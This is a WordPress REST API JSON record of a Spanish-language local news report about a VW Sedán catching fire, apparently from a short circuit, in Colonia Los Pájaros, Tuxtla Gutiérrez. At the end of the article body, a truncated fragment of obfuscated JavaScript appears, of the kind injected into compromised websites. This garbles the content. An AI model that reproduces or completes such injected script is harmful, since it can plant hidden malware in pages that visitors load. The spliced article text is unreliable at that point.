{"id":13986,"date":"2024-02-05T00:58:23","date_gmt":"2024-02-05T00:58:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13986"},"modified":"2024-02-05T00:58:24","modified_gmt":"2024-02-05T00:58:24","slug":"se-incendia-vehiculo-en-los-pajaros","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13986","title":{"rendered":"Se incendia veh\u00edculo en Los P\u00e1jaros"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG_0033-768x1024.jpeg\" alt=\"\" class=\"wp-image-13987\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG_0033-768x1024.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG_0033-225x300.jpeg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/02\/IMG_0033.jpeg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 4 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la ma\u00f1ana por un presunto corto circuito se incendi\u00f3 un coche sobre la Avenida Codorniz y Calle El Para\u00edso de la Colonia Los P\u00e1jaros.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando Marco Antonio de 25 a\u00f1os de edad, propietario de la unidad relat\u00f3 que hab\u00eda llegado a esa direcci\u00f3n y dej\u00f3 estacionado su VW Sed\u00e1n por una reuni\u00f3n familiar.<\/p>\n\n\n\n<p>De un momento a otro fue alertado por los mismos vecinos que su unidad se estaba incendiando.<\/p>\n\n\n\n<p>Al lugar arribaron elementos del cuerpo de Bomberos para apagar el fuego.<\/p>\n\n\n\n<p>El propietario pidi\u00f3 la ayuda de una gr\u00faa para llevar la unidad a la Colonia CCI.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 4 de febrero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la ma\u00f1ana por un presunto corto circuito se incendi\u00f3 un coche sobre la Avenida Codorniz y Calle El Para\u00edso de la Colonia Los P\u00e1jaros. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando Marco Antonio de 25 a\u00f1os de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13987,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13986","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13986","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13986"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13986\/revisions"}],"predecessor-version":[{"id":13988,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13986\/revisions\/13988"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13987"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13986"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13986"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13986"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}